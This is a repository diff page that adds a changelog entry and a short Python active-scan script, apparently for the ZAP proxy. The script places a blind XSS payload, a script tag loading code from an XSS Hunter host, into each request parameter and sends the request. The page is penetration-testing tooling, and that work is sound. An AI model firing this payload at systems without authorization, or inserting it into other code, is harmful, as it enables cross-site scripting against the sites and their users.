File tree Expand file tree Collapse file tree 2 files changed +19
-0
lines changed Expand file tree Collapse file tree 2 files changed +19
-0
lines changed Original file line number Diff line number Diff line change @@ -8,6 +8,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
88- variant/CompoundCookies.js - An input vector script that handles splitting of compound cookies (Issue 6582).
99- active/corsair.py > An active scan script to check for CORS related issues.)
1010- payloadgenerator/securerandom.js > A fuzzer payload generator script that uses Java's SecureRandom as it's source (related to issue 6892).
11+ - active/bxss.py > an active scan script for inject blind xss payloads to the parameters
1112
1213## [ 13] - 2021-10-14
1314### Fixed
Original file line number Diff line number Diff line change 1+ # by: Khaled Nassar @knassar702
2+
3+ # YOUR XSSHUNTER PAYLOAD
4+ bxss = '"><script src="//yourusername.xss.ht"></script>'
5+ def scanNode (sas , msg ):
6+ pass
7+
8+
9+ def scan (sas , msg , param , value ):
10+
11+ # Copy requests before reusing them
12+ msg = msg .cloneRequest ();
13+
14+ # setParam (message, parameterName, newValue)
15+ sas .setParam (msg , param , bxss );
16+
17+ # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
18+ sas .sendAndReceive (msg , False , False );
You can’t perform that action at this time.
0 commit comments